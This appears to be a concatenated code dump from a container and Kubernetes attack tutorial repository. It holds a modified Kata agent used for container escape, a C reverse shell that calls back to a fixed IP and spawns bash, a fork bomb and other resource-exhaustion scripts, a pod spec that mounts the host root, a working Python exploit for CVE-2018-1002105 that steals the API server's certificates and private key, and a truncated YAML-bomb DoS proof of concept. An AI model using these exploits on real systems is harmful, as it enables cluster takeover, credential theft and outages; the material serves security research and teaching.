func (a *agentGRPC) UpdateInterface(ctx context.Context, req *pb.UpdateInterfaceRequest) (*types.Interface, error) {
return a.sandbox.updateInterface(nil, req.Interface)
}
func (a *agentGRPC) UpdateRoutes(ctx context.Context, req *pb.UpdateRoutesRequest) (*pb.Routes, error) {
return a.sandbox.updateRoutes(nil, req.Routes)
}
func (a *agentGRPC) ListInterfaces(ctx context.Context, req *pb.ListInterfacesRequest) (*pb.Interfaces, error) {
return a.sandbox.listInterfaces(nil)
}
func (a *agentGRPC) ListRoutes(ctx context.Context, req *pb.ListRoutesRequest) (*pb.Routes, error) {
return a.sandbox.listRoutes(nil)
}
func (a *agentGRPC) OnlineCPUMem(ctx context.Context, req *pb.OnlineCPUMemRequest) (*gpb.Empty, error) {
if !req.Wait {
go a.onlineCPUMem(req)
return emptyResp, nil
}
return emptyResp, a.onlineCPUMem(req)
}
func (a *agentGRPC) ReseedRandomDev(ctx context.Context, req *pb.ReseedRandomDevRequest) (*gpb.Empty, error) {
return emptyResp, reseedRNG(req.Data)
}
func (a *agentGRPC) GetGuestDetails(ctx context.Context, req *pb.GuestDetailsRequest) (*pb.GuestDetailsResponse, error) {
var details pb.GuestDetailsResponse
if req.MemBlockSize {
data, err := ioutil.ReadFile(sysfsMemoryBlockSizePath)
if err != nil {
if os.IsNotExist(err) {
agentLog.WithField("sysfsMemoryBlockSizePath", sysfsMemoryBlockSizePath).Info("Guest kernel config doesn't support memory hotplug")
} else {
return nil, err
}
} else {
if len(data) == 0 {
return nil, fmt.Errorf("%v is empty", sysfsMemoryBlockSizePath)
}
details.MemBlockSizeBytes, err = strconv.ParseUint(string(data[:len(data)-1]), 16, 64)
if err != nil {
return nil, err
}
}
}
if req.MemHotplugProbe {
if _, err := os.Stat(sysfsMemoryHotplugProbePath); os.IsNotExist(err) {
details.SupportMemHotplugProbe = false
} else if err != nil {
return nil, err
} else {
details.SupportMemHotplugProbe = true
}
}
details.AgentDetails = a.getAgentDetails(ctx)
return &details, nil
}
func (a *agentGRPC) MemHotplugByProbe(ctx context.Context, req *pb.MemHotplugByProbeRequest) (*gpb.Empty, error) {
for _, addr := range req.MemHotplugProbeAddr {
if err := ioutil.WriteFile(sysfsMemoryHotplugProbePath, []byte(fmt.Sprintf("0x%x", addr)), 0600); err != nil {
return emptyResp, err
}
}
return emptyResp, nil
}
func (a *agentGRPC) haveSeccomp() bool {
if seccompSupport == "yes" && seccomp.IsEnabled() {
return true
}
return false
}
func (a *agentGRPC) getAgentDetails(ctx context.Context) *pb.AgentDetails {
details := pb.AgentDetails{
Version: version,
InitDaemon: os.Getpid() == 1,
SupportsSeccomp: a.haveSeccomp(),
}
for handler := range deviceHandlerList {
details.DeviceHandlers = append(details.DeviceHandlers, handler)
}
for handler := range storageHandlerList {
details.StorageHandlers = append(details.StorageHandlers, handler)
}
return &details
}
func (a *agentGRPC) SetGuestDateTime(ctx context.Context, req *pb.SetGuestDateTimeRequest) (*gpb.Empty, error) {
if err := syscall.Settimeofday(&syscall.Timeval{Sec: req.Sec, Usec: req.Usec}); err != nil {
return nil, grpcStatus.Errorf(codes.Internal, "Could not set guest time: %v", err)
}
return &gpb.Empty{}, nil
}
// CopyFile copies files from the host to the container's rootfs (guest). Files can be copied in parts.
// For example, a file whose size is 2MB can be copied by calling CopyFile twice: in the first call req.Offset is 0,
// req.FileSize is 2MB and req.Data contains the first half of the file; in the second call req.Offset is 1MB,
// req.FileSize is 2MB and req.Data contains the second half of the file. For security reasons, all write operations
// are made to a temporary file; once the temporary file reaches the expected size (req.FileSize), it is moved to the
// destination file (req.Path).
func (a *agentGRPC) CopyFile(ctx context.Context, req *pb.CopyFileRequest) (*gpb.Empty, error) {
// get absolute path, to avoid paths like '/run/../sbin/init'
path, err := filepath.Abs(req.Path)
if err != nil {
return emptyResp, err
}
// The container's rootfs is mounted under /run; in order to avoid overwriting the guest's rootfs
// files, it is only possible to copy files into /run.
if !strings.HasPrefix(path, containersRootfsPath) {
return emptyResp, fmt.Errorf("it is only possible to copy files into the %s directory", containersRootfsPath)
}
if err := os.MkdirAll(filepath.Dir(path), os.FileMode(req.DirMode)); err != nil {
return emptyResp, err
}
// create a temporary file and write the content.
tmpPath := path + ".tmp"
tmpFile, err := os.OpenFile(tmpPath, os.O_WRONLY|os.O_CREATE, 0600)
if err != nil {
return emptyResp, err
}
if _, err := tmpFile.WriteAt(req.Data, req.Offset); err != nil {
tmpFile.Close()
return emptyResp, err
}
tmpFile.Close()
// get temporary file information
st, err := os.Stat(tmpPath)
if err != nil {
return emptyResp, err
}
agentLog.WithFields(logrus.Fields{
"tmp-file-size": st.Size(),
"expected-size": req.FileSize,
}).Debugf("Checking temporary file size")
// If the file size is not equal to the expected size, the copy operation has not finished yet.
// CopyFile should be called again with new content and a different offset.
if st.Size() != req.FileSize {
return emptyResp, nil
}
if err := os.Chmod(tmpPath, os.FileMode(req.FileMode)); err != nil {
return emptyResp, err
}
if err := os.Chown(tmpPath, int(req.Uid), int(req.Gid)); err != nil {
return emptyResp, err
}
// At this point the temporary file has the expected size; atomically move it, overwriting
// the destination.
agentLog.WithFields(logrus.Fields{
"tmp-path": tmpPath,
"des-path": path,
}).Debugf("Moving temporary file")
if err := os.Rename(tmpPath, path); err != nil {
return emptyResp, err
}
return emptyResp, nil
}
func (a *agentGRPC) StartTracing(ctx context.Context, req *pb.StartTracingRequest) (*gpb.Empty, error) {
// We could check 'tracing' too and error if already set. But
// instead, we permit that scenario, making this call a NOP if tracing
// is already enabled via traceModeFlag.
if startTracingCalled {
return nil, grpcStatus.Error(codes.FailedPrecondition, "tracing already enabled")
}
// The only trace type supported for dynamic tracing is isolated.
enableTracing(traceModeDynamic, traceTypeIsolated)
startTracingCalled = true
var err error
// Ignore the provided context and recreate the root context.
// Note that this call will not be traced, but all subsequent ones
// will be.
rootSpan, rootContext, err = setupTracing(agentName)
if err != nil {
return nil, fmt.Errorf("failed to setup tracing: %v", err)
}
a.sandbox.ctx = rootContext
grpcContext = rootContext
return emptyResp, nil
}
func (a *agentGRPC) StopTracing(ctx context.Context, req *pb.StopTracingRequest) (*gpb.Empty, error) {
// Like StartTracing(), this call permits tracing to be stopped when
// it was originally started using traceModeFlag.
if !tracing && !startTracingCalled {
return nil, grpcStatus.Error(codes.FailedPrecondition, "tracing not enabled")
}
if stopTracingCalled {
return nil, grpcStatus.Error(codes.FailedPrecondition, "tracing already disabled")
}
// Signal to the interceptors that tracing needs to end.
stopTracingCalled = true
return emptyResp, nil
}
================================================
FILE: code/0304-运行时攻击/02-安全容器逃逸/evil_agent_src/mount.go
================================================
//
// Copyright (c) 2017-2019 Intel Corporation
//
// SPDX-License-Identifier: Apache-2.0
//
package main
import (
"bufio"
"context"
"fmt"
"os"
"path/filepath"
"regexp"
"strconv"
"strings"
"syscall"
pb "github.com/kata-containers/agent/protocols/grpc"
"github.com/pkg/errors"
"github.com/sirupsen/logrus"
"golang.org/x/sys/unix"
"google.golang.org/grpc/codes"
grpcStatus "google.golang.org/grpc/status"
)
const (
type9pFs = "9p"
typeVirtioFS = "virtio_fs"
typeRootfs = "rootfs"
typeTmpFs = "tmpfs"
procMountStats = "/proc/self/mountstats"
mountPerm = os.FileMode(0755)
)
var flagList = map[string]int{
"acl": unix.MS_POSIXACL,
"bind": unix.MS_BIND,
"defaults": 0,
"dirsync": unix.MS_DIRSYNC,
"iversion": unix.MS_I_VERSION,
"lazytime": unix.MS_LAZYTIME,
"mand": unix.MS_MANDLOCK,
"noatime": unix.MS_NOATIME,
"nodev": unix.MS_NODEV,
"nodiratime": unix.MS_NODIRATIME,
"noexec": unix.MS_NOEXEC,
"nosuid": unix.MS_NOSUID,
"rbind": unix.MS_BIND | unix.MS_REC,
"relatime": unix.MS_RELATIME,
"remount": unix.MS_REMOUNT,
"ro": unix.MS_RDONLY,
"silent": unix.MS_SILENT,
"strictatime": unix.MS_STRICTATIME,
"sync": unix.MS_SYNCHRONOUS,
"private": unix.MS_PRIVATE,
"shared": unix.MS_SHARED,
"slave": unix.MS_SLAVE,
"unbindable": unix.MS_UNBINDABLE,
"rprivate": unix.MS_PRIVATE | unix.MS_REC,
"rshared": unix.MS_SHARED | unix.MS_REC,
"rslave": unix.MS_SLAVE | unix.MS_REC,
"runbindable": unix.MS_UNBINDABLE | unix.MS_REC,
}
func createDestinationDir(dest string) error {
targetPath, _ := filepath.Split(dest)
return os.MkdirAll(targetPath, mountPerm)
}
// mount mounts a source into a destination. This will do some bookkeeping:
// * evaluate all symlinks
// * ensure the source exists
func mount(source, destination, fsType string, flags int, options string) error {
var absSource string
// Log before validation. This is useful to debug cases where the gRPC
// protocol version being used by the client is out of sync with the
// agent's version. gRPC message members are strictly ordered, so it's
// quite possible that if the protocol changes, the client may try to
// pass a valid mountpoint, but the gRPC layer may turn that, through
// the member ordering, into a mount *option* for example.
agentLog.WithFields(logrus.Fields{
"mount-source": source,
"mount-destination": destination,
"mount-fstype": fsType,
"mount-flags": flags,
"mount-options": options,
}).Debug()
if source == "" {
return fmt.Errorf("need mount source")
}
if destination == "" {
return fmt.Errorf("need mount destination")
}
if fsType == "" {
return fmt.Errorf("need mount FS type")
}
var err error
switch fsType {
case type9pFs, typeVirtioFS:
if err = createDestinationDir(destination); err != nil {
return err
}
absSource = source
case typeTmpFs:
absSource = source
default:
absSource, err = filepath.EvalSymlinks(source)
if err != nil {
return grpcStatus.Errorf(codes.Internal, "Could not resolve symlink for source %v", source)
}
if err = ensureDestinationExists(absSource, destination, fsType); err != nil {
return grpcStatus.Errorf(codes.Internal, "Could not create destination mount point: %v: %v",
destination, err)
}
}
if err = syscall.Mount(absSource, destination,
fsType, uintptr(flags), options); err != nil {
return grpcStatus.Errorf(codes.Internal, "Could not mount %v to %v: %v",
absSource, destination, err)
}
return nil
}
// ensureDestinationExists will recursively create a given mountpoint. If directories
// are created, their permissions are initialized to mountPerm
func ensureDestinationExists(source, destination string, fsType string) error {
fileInfo, err := os.Stat(source)
if err != nil {
return grpcStatus.Errorf(codes.Internal, "could not stat source location: %v",
source)
}
if err := createDestinationDir(destination); err != nil {
return grpcStatus.Errorf(codes.Internal, "could not create parent directory: %v",
destination)
}
if fsType != "bind" || fileInfo.IsDir() {
if err := os.Mkdir(destination, mountPerm); !os.IsExist(err) {
return err
}
} else {
file, err := os.OpenFile(destination, os.O_CREATE, mountPerm)
if err != nil {
return err
}
file.Close()
}
return nil
}
func parseMountFlagsAndOptions(optionList []string) (int, string) {
var (
flags int
options []string
)
for _, opt := range optionList {
flag, ok := flagList[opt]
if ok {
flags |= flag
continue
}
options = append(options, opt)
}
return flags, strings.Join(options, ",")
}
func parseOptions(optionList []string) map[string]string {
options := make(map[string]string)
for _, opt := range optionList {
idx := strings.Index(opt, "=")
if idx < 1 {
continue
}
key, val := opt[:idx], opt[idx+1:]
options[key] = val
}
return options
}
func removeMounts(mounts []string) error {
for _, mount := range mounts {
if err := syscall.Unmount(mount, 0); err != nil {
return err
}
}
return nil
}
// storageHandler is the type of callback to be defined to handle every
// type of storage driver.
type storageHandler func(ctx context.Context, storage pb.Storage, s *sandbox) (string, error)
// storageHandlerList lists the supported drivers.
var storageHandlerList = map[string]storageHandler{
driver9pType: virtio9pStorageHandler,
driverVirtioFSType: virtioFSStorageHandler,
driverBlkType: virtioBlkStorageHandler,
driverBlkCCWType: virtioBlkCCWStorageHandler,
driverMmioBlkType: virtioMmioBlkStorageHandler,
driverSCSIType: virtioSCSIStorageHandler,
driverEphemeralType: ephemeralStorageHandler,
driverLocalType: localStorageHandler,
}
func ephemeralStorageHandler(_ context.Context, storage pb.Storage, s *sandbox) (string, error) {
s.Lock()
defer s.Unlock()
newStorage := s.setSandboxStorage(storage.MountPoint)
if newStorage {
var err error
if err = os.MkdirAll(storage.MountPoint, os.ModePerm); err == nil {
_, err = commonStorageHandler(storage)
}
return "", err
}
return "", nil
}
func localStorageHandler(_ context.Context, storage pb.Storage, s *sandbox) (string, error) {
s.Lock()
defer s.Unlock()
newStorage := s.setSandboxStorage(storage.MountPoint)
if newStorage {
// Extract and parse the mode out of the storage options.
// Default to os.ModePerm.
opts := parseOptions(storage.Options)
mode := os.ModePerm
if val, ok := opts["mode"]; ok {
m, err := strconv.ParseUint(val, 8, 32)
if err != nil {
return "", err
}
mode = os.FileMode(m)
}
if err := os.MkdirAll(storage.MountPoint, mode); err != nil {
return "", err
}
// We chmod the permissions for the mount point, as we can't rely on os.MkdirAll to set the
// desired permissions.
return "", os.Chmod(storage.MountPoint, mode)
}
return "", nil
}
// virtio9pStorageHandler handles the storage for 9p driver.
func virtio9pStorageHandler(_ context.Context, storage pb.Storage, s *sandbox) (string, error) {
return commonStorageHandler(storage)
}
// virtioMmioBlkStorageHandler handles the storage for mmio blk driver.
func virtioMmioBlkStorageHandler(_ context.Context, storage pb.Storage, s *sandbox) (string, error) {
// The source path is VmPath
return commonStorageHandler(storage)
}
// virtioBlkCCWStorageHandler handles the storage for blk ccw driver.
func virtioBlkCCWStorageHandler(ctx context.Context, storage pb.Storage, s *sandbox) (string, error) {
devPath, err := getBlkCCWDevPath(s, storage.Source)
if err != nil {
return "", err
}
if devPath == "" {
return "", grpcStatus.Errorf(codes.InvalidArgument,
"Storage source is empty")
}
storage.Source = devPath
return commonStorageHandler(storage)
}
// virtioFSStorageHandler handles the storage for virtio-fs.
func virtioFSStorageHandler(_ context.Context, storage pb.Storage, s *sandbox) (string, error) {
return commonStorageHandler(storage)
}
// virtioBlkStorageHandler handles the storage for blk driver.
func virtioBlkStorageHandler(_ context.Context, storage pb.Storage, s *sandbox) (string, error) {
// If hot-plugged, get the device node path based on the PCI address else
// use the virt path provided in Storage Source
if strings.HasPrefix(storage.Source, "/dev") {
FileInfo, err := os.Stat(storage.Source)
if err != nil {
return "", err
}
// Make sure the virt path is valid
if FileInfo.Mode()&os.ModeDevice == 0 {
return "", fmt.Errorf("invalid device %s", storage.Source)
}
} else {
devPath, err := getPCIDeviceName(s, storage.Source)
if err != nil {
return "", err
}
storage.Source = devPath
}
return commonStorageHandler(storage)
}
// virtioSCSIStorageHandler handles the storage for scsi driver.
func virtioSCSIStorageHandler(ctx context.Context, storage pb.Storage, s *sandbox) (string, error) {
// Retrieve the device path from SCSI address.
devPath, err := getSCSIDevPath(s, storage.Source)
if err != nil {
return "", err
}
storage.Source = devPath
return commonStorageHandler(storage)
}
func commonStorageHandler(storage pb.Storage) (string, error) {
// Mount the storage device.
if err := mountStorage(storage); err != nil {
return "", err
}
return storage.MountPoint, nil
}
// mountStorage performs the mount described by the storage structure.
func mountStorage(storage pb.Storage) error {
flags, options := parseMountFlagsAndOptions(storage.Options)
return mount(storage.Source, storage.MountPoint, storage.Fstype, flags, options)
}
// addStorages takes a list of storages passed by the caller, and performs the
// associated operations such as waiting for the device to show up, and mounting
// it to a specific location, according to the type of handler chosen, and for
// each storage.
func addStorages(ctx context.Context, storages []*pb.Storage, s *sandbox) (mounts []string, err error) {
span, ctx := trace(ctx, "mount", "addStorages")
span.setTag("sandbox", s.id)
defer span.finish()
var mountList []string
var storageList []string
defer func() {
if err != nil {
s.Lock()
for _, path := range storageList {
if err := s.unsetAndRemoveSandboxStorage(path); err != nil {
agentLog.WithFields(logrus.Fields{
"error": err,
"path": path,
}).Error("failed to roll back addStorages")
}
}
s.Unlock()
}
}()
for _, storage := range storages {
if storage == nil {
continue
}
devHandler, ok := storageHandlerList[storage.Driver]
if !ok {
return nil, grpcStatus.Errorf(codes.InvalidArgument,
"Unknown storage driver %q", storage.Driver)
}
// Wrap the span around the handler call to avoid modifying
// the handler interface but also to avoid having to add trace
// code to each driver.
handlerSpan, _ := trace(ctx, "mount", storage.Driver)
mountPoint, err := devHandler(ctx, *storage, s)
handlerSpan.finish()
if _, ok := s.storages[storage.MountPoint]; ok {
storageList = append([]string{storage.MountPoint}, storageList...)
}
if err != nil {
return nil, err
}
if mountPoint != "" {
// Prepend mount point to mount list.
mountList = append([]string{mountPoint}, mountList...)
}
}
return mountList, nil
}
// getMountFSType returns the FS type corresponding to the passed mount point and
// any error encountered.
func getMountFSType(mountPoint string) (string, error) {
if mountPoint == "" {
return "", errors.Errorf("Invalid mount point '%s'", mountPoint)
}
mountstats, err := os.Open(procMountStats)
if err != nil {
return "", errors.Wrapf(err, "Failed to open file '%s'", procMountStats)
}
defer mountstats.Close()
// Refer to fs/proc_namespace.c:show_vfsstat() for
// the file format.
re := regexp.MustCompile(fmt.Sprintf(`device .+ mounted on %s with fstype (.+)`, mountPoint))
scanner := bufio.NewScanner(mountstats)
for scanner.Scan() {
line := scanner.Text()
matches := re.FindStringSubmatch(line)
if len(matches) > 1 {
return matches[1], nil
}
}
if err := scanner.Err(); err != nil {
return "", errors.Wrapf(err, "Failed to parse proc mount stats file %s", procMountStats)
}
return "", errors.Errorf("Failed to find FS type for mount point '%s'", mountPoint)
}
================================================
FILE: code/0304-运行时攻击/02-安全容器逃逸/evil_bin.c
================================================
/* credits to http://blog.techorganic.com/2015/01/04/pegasus-hacking-challenge/ */
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define REMOTE_ADDR "172.16.56.1"
#define REMOTE_PORT 10000
int main(int argc, char *argv[])
{
struct sockaddr_in sa;
int s;
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = inet_addr(REMOTE_ADDR);
sa.sin_port = htons(REMOTE_PORT);
s = socket(AF_INET, SOCK_STREAM, 0);
connect(s, (struct sockaddr *)&sa, sizeof(sa));
dup2(s, 0);
dup2(s, 1);
dup2(s, 2);
execve("/bin/bash", 0, 0);
return 0;
}
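evil_bin.c works by duplicating the connected socket onto file descriptors 0, 1, and 2 before execve, so the spawned shell reads commands from and writes output to the TCP connection. A hedged sketch of that fd-duplication mechanism using a local socketpair instead of a network socket (no real connection; all names are illustrative):

```python
import os
import socket

# A connected pair of sockets standing in for the reverse-shell TCP connection
parent, child = socket.socketpair()

pid = os.fork()
if pid == 0:
    # Child: duplicate the socket onto stdout (fd 1), as dup2(s, 1) does in evil_bin.c
    os.dup2(child.fileno(), 1)
    # Anything written to fd 1 now travels over the socket
    os.write(1, b"hello from duped fd\n")
    os._exit(0)

os.waitpid(pid, 0)
data = parent.recv(64)
print(data.decode())
```

The PoC does the same for fds 0 and 2 as well, so stdin and stderr of the executed /bin/bash are also wired to the attacker's socket.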
================================================
FILE: code/0304-运行时攻击/02-安全容器逃逸/exploit.sh
================================================
#!/bin/bash
set -e
# warm up
echo "[*] Running an Ubuntu container to warm up..."
docker run --rm ubuntu uname -a
echo "[*] Exploiting to escape kata..."
echo "[*] Running malicious container with kata on CLH..."
docker run --rm --name stage1 kata-malware-image:latest
echo "[+] Guest image file has been compromised"
echo "[*] Running malicious container with kata on CLH once again..."
docker run --rm -d --name stage2 kata-malware-image:latest
echo "[+] Done. Now you can wait for the reverse shell :)"
================================================
FILE: code/0304-运行时攻击/02-安全容器逃逸/get_kata_src.sh
================================================
#!/bin/bash
mkdir -p $GOPATH/src/github.com/kata-containers/
cd $GOPATH/src/github.com/kata-containers/
git clone https://github.com/kata-containers/agent
cd agent
git checkout 1.10.0
================================================
FILE: code/0304-运行时攻击/02-安全容器逃逸/install_kata.sh
================================================
#!/bin/bash
set -e -x
# Download the release tarball (skip this step if already downloaded)
#wget https://github.com/kata-containers/runtime/releases/download/1.10.0/kata-static-1.10.0-x86_64.tar.xz
tar xf kata-static-1.10.0-x86_64.tar.xz
rm -rf /opt/kata
mv ./opt/kata /opt
rmdir ./opt
rm -rf /etc/kata-containers
cp -r /opt/kata/share/defaults/kata-containers /etc/
# Use Cloud Hypervisor as the hypervisor
rm /etc/kata-containers/configuration.toml
ln -s /etc/kata-containers/configuration-clh.toml /etc/kata-containers/configuration.toml
# Configure Docker
mkdir -p /etc/docker/
cat << EOF > /etc/docker/daemon.json
{
"runtimes": {
"kata-runtime": {
"path": "/opt/kata/bin/kata-runtime"
},
"kata-clh": {
"path": "/opt/kata/bin/kata-clh"
},
"kata-qemu": {
"path": "/opt/kata/bin/kata-qemu"
}
},
"registry-mirrors": ["https://docker.mirrors.ustc.edu.cn/"]
}
EOF
mkdir -p /etc/systemd/system/docker.service.d/
cat << EOF > /etc/systemd/system/docker.service.d/kata-containers.conf
[Service]
ExecStart=
ExecStart=/usr/bin/dockerd -D --add-runtime kata-runtime=/opt/kata/bin/kata-runtime --add-runtime kata-clh=/opt/kata/bin/kata-clh --add-runtime kata-qemu=/opt/kata/bin/kata-qemu --default-runtime=kata-runtime
EOF
# Reload configuration & restart Docker
systemctl daemon-reload && systemctl restart docker
================================================
FILE: code/0304-运行时攻击/03-资源耗尽型攻击/exhaust_cpu.sh
================================================
#!/bin/bash
# for Debian & Ubuntu
# apt install -y stress
stress -c 1000
================================================
FILE: code/0304-运行时攻击/03-资源耗尽型攻击/exhaust_disk.sh
================================================
#!/bin/bash
# for Debian & Ubuntu
# apt install -y util-linux
fallocate -l 9.4G ./bomb
================================================
FILE: code/0304-运行时攻击/03-资源耗尽型攻击/exhaust_mem.sh
================================================
#!/bin/bash
# for Debian & Ubuntu
# apt install -y stress
stress --vm-bytes 3300m --vm-keep -m 3
================================================
FILE: code/0304-运行时攻击/03-资源耗尽型攻击/exhaust_pid.sh
================================================
#!/bin/bash
# Fork bomb: the function ":" pipes into itself and backgrounds each copy,
# doubling the number of processes until the PID space is exhausted
:() { :|:& };:
================================================
FILE: code/0402-Kubernetes组件不安全配置/deploy_escape_pod_on_remote_host.sh
================================================
#!/bin/bash
cat << EOF > escape.yaml
# attacker.yaml
apiVersion: v1
kind: Pod
metadata:
name: attacker
spec:
containers:
- name: ubuntu
image: ubuntu:latest
imagePullPolicy: IfNotPresent
# Just spin & wait forever
command: [ "/bin/bash", "-c", "--" ]
args: [ "while true; do sleep 30; done;" ]
volumeMounts:
- name: escape-host
mountPath: /host-escape-door
volumes:
- name: escape-host
hostPath:
path: /
EOF
kubectl -s TARGET-IP:8080 apply -f escape.yaml
sleep 8
kubectl -s TARGET-IP:8080 exec -it attacker -- /bin/bash
================================================
FILE: code/0403-CVE-2018-1002105/attacker.yaml
================================================
# attacker.yaml
apiVersion: v1
kind: Pod
metadata:
name: attacker
spec:
containers:
- name: ubuntu
image: ubuntu:latest
imagePullPolicy: IfNotPresent
# Just spin & wait forever
command: [ "/bin/bash", "-c", "--" ]
args: [ "while true; do sleep 30; done;" ]
volumeMounts:
- name: escape-host
mountPath: /host-escape-door
volumes:
- name: escape-host
hostPath:
path: /
================================================
FILE: code/0403-CVE-2018-1002105/cve_2018_1002105_namespace.yaml
================================================
# cve_2018_1002105_namespace.yaml
apiVersion: v1
kind: Namespace
metadata:
name: test
================================================
FILE: code/0403-CVE-2018-1002105/cve_2018_1002105_pod.yaml
================================================
# cve_2018_1002105_pod.yaml
apiVersion: v1
kind: Pod
metadata:
name: test
namespace: test
spec:
containers:
- name: ubuntu
image: ubuntu:latest
imagePullPolicy: IfNotPresent
# Just spin & wait forever
command: [ "/bin/bash", "-c", "--" ]
args: [ "while true; do sleep 30; done;" ]
serviceAccount: default
serviceAccountName: default
================================================
FILE: code/0403-CVE-2018-1002105/cve_2018_1002105_role.yaml
================================================
# cve_2018_1002105_role.yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: test
namespace: test
rules:
- apiGroups:
- ""
resources:
- pods
verbs:
- get
- list
- delete
- watch
- apiGroups:
- ""
resources:
- pods/exec
verbs:
- create
- get
================================================
FILE: code/0403-CVE-2018-1002105/cve_2018_1002105_role_binding.yaml
================================================
# cve_2018_1002105_role_binding.yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: test
namespace: test
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: test
subjects:
- apiGroup: rbac.authorization.k8s.io
kind: Group
name: test
================================================
FILE: code/0403-CVE-2018-1002105/exploit.py
================================================
"""ExP for CVE-2018-1002105
ONLY USED FOR SECURITY RESEARCH
ILLEGAL USE IS **PROHIBITED**
"""
import base64
from secrets import token_bytes
import sys
import argparse
import socket
import ssl
from urllib import parse
import json
try:
from http_parser.parser import HttpParser
except ImportError:
from http_parser.pyparser import HttpParser
context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
# Args
parser = argparse.ArgumentParser(description='ExP for CVE-2018-1002105.')
required = parser.add_argument_group('required arguments')
required.add_argument('--target', '-t', dest='host', type=str,
help='API Server\'s IP', required=True)
required.add_argument('--port', '-p', dest='port', type=str,
help='API Server\'s port', required=True)
required.add_argument('--bearer-token', '-b', dest='token', type=str,
help='Bearer token for the low privileged user', required=True)
required.add_argument('--namespace', '-n', dest='namespace', type=str,
                      help='Namespace with method access', required=True)
required.add_argument('--pod', '-P', dest='pod', type=str,
required=True, help='Pod with method access')
args = parser.parse_args()
# HTTP Gadgets
http_delimiter = '\r\n'
host_header = f'Host: {args.host}:{args.port}'
auth_header = f'Authorization: Bearer {args.token}'
conn_header = 'Connection: upgrade'
upgrade_header = 'Upgrade: websocket'
agent_header = 'User-Agent: curl/7.64.1'
accept_header = 'Accept: */*'
origin_header = f'Origin: http://{args.host}:{args.port}'
sec_key = base64.b64encode(token_bytes(20)).decode('utf-8')
sec_websocket_key = f'Sec-WebSocket-Key: {sec_key}'
sec_websocket_version = 'Sec-WebSocket-Version: 13'
# secret targets
ca_crt = 'ca.crt'
client_crt = 'apiserver-kubelet-client.crt'
client_key = 'apiserver-kubelet-client.key'
def _get_http_body(byte_http):
p = HttpParser()
recved = len(byte_http)
p.execute(byte_http, recved)
return p.recv_body().decode('utf-8')
def _recv_all_once(ssock, length=4096):
res = b""
incoming = True
while incoming:
try:
res += ssock.recv(length)
except socket.timeout:
if not res:
continue
else:
break
return res
def _try_to_get_privilege(ssock, namespace, pod):
payload1 = http_delimiter.join(
(f'GET /api/v1/namespaces/{namespace}/pods/{pod}/exec HTTP/1.1',
host_header,
auth_header,
upgrade_header,
conn_header))
payload1 += http_delimiter * 2
ssock.send(payload1.encode('utf-8'))
def _run_with_privilege(ssock, get_path):
payload = http_delimiter.join(
(f'GET {get_path} HTTP/1.1',
host_header,
auth_header,
conn_header,
upgrade_header,
origin_header,
sec_websocket_key,
sec_websocket_version))
payload += http_delimiter * 2
ssock.send(payload.encode('utf-8'))
def _match_or_exit(banner_bytes, resp, fail_message="[-] Failed."):
if banner_bytes in resp:
return
print(fail_message)
sys.exit(1)
def _get_secret(resp):
delimiter = b'-----'
start = resp.index(delimiter)
end = resp.rindex(delimiter)
return resp[start:end + len(delimiter)].decode('utf-8')
def _save_file(file_name, content):
with open(file_name, 'w') as f:
f.write(content)
def _steal_secret(api_server, secret_file, match_banner):
with socket.create_connection((args.host, int(args.port))) as sock:
with context.wrap_socket(sock, server_hostname=args.host) as ssock:
ssock.settimeout(1)
print('[*] Creating new privileged pipe...')
_try_to_get_privilege(ssock, namespace=args.namespace, pod=args.pod)
resp = _recv_all_once(ssock)
_match_or_exit(b'stdin, stdout, stderr', resp)
print(f"[*] Trying to steal {secret_file}...")
cmd1 = parse.quote('/bin/cat')
cmd2 = parse.quote(f"/etc/kubernetes/pki/{secret_file}")
_run_with_privilege(
ssock,
f'/exec/kube-system/{api_server}/kube-apiserver?command={cmd1}&command={cmd2}&input=1&output=1&tty=0')
resp = _recv_all_once(ssock)
_match_or_exit(b'HTTP/1.1 101 Switching Protocols', resp)
_match_or_exit(match_banner, resp, fail_message=f'[-] Cannot find banner {match_banner}.')
print(f'[+] Got {secret_file}.')
secret_content = _get_secret(resp)
_save_file(secret_file, secret_content)
print(f'[+] Secret {secret_file} saved :)')
def main():
print("[*] Exploiting CVE-2018-1002105...")
with socket.create_connection((args.host, int(args.port))) as sock:
with context.wrap_socket(sock, server_hostname=args.host) as ssock:
# step 1
ssock.settimeout(1)
print("[*] Checking vulnerable or not...")
_try_to_get_privilege(ssock, namespace=args.namespace, pod=args.pod)
resp = _recv_all_once(ssock)
_match_or_exit(
b'stdin, stdout, stderr',
resp,
fail_message='[-] Not vulnerable to CVE-2018-1002105.')
print("[+] Vulnerable to CVE-2018-1002105, continue.")
# step 2
print("[*] Getting running pods list...")
_run_with_privilege(ssock, '/runningpods/')
resp = _recv_all_once(ssock)
_match_or_exit(b'HTTP/1.1 200 OK', resp)
print("[+] Got running pods list.")
pods_info = json.loads(_get_http_body(resp))
pods_list = [pod['metadata']['name'] for pod in pods_info['items']]
for pod in pods_list:
if pod.startswith('kube-apiserver'):
api_server = pod
break
else:
print("[-] Cannot find API Server.")
sys.exit(1)
print(f"[*] API Server is {api_server}.")
# step 3
_steal_secret(
api_server=api_server,
secret_file=ca_crt,
match_banner=b'BEGIN CERTIFICATE')
_steal_secret(
api_server=api_server,
secret_file=client_crt,
match_banner=b'BEGIN CERTIFICATE')
_steal_secret(
api_server=api_server,
secret_file=client_key,
match_banner=b'BEGIN RSA PRIVATE KEY')
print('[+] Enjoy your trip :)')
cmd_try = f"kubectl --server=https://{args.host}:{args.port}" \
f" --certificate-authority={ca_crt}" \
f" --client-certificate={client_crt}" \
f" --client-key={client_key} get pods -n kube-system"
print(cmd_try)
if __name__ == "__main__":
main()
================================================
FILE: code/0403-CVE-2018-1002105/test-token.csv
================================================
password,test,test,test
================================================
FILE: code/0404-K8s拒绝服务攻击/CVE-2019-11253-poc.sh
================================================
#!/bin/bash
# Check the Kubernetes version
kubectl version | grep Server
# Open a proxy to the API Server
kubectl proxy &
# Create a malicious ConfigMap file (n=9)
cat << EOF > cve-2019-11253.yaml
apiVersion: v1
data:
a: &a ["web","web","web","web","web","web","web","web","web"]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
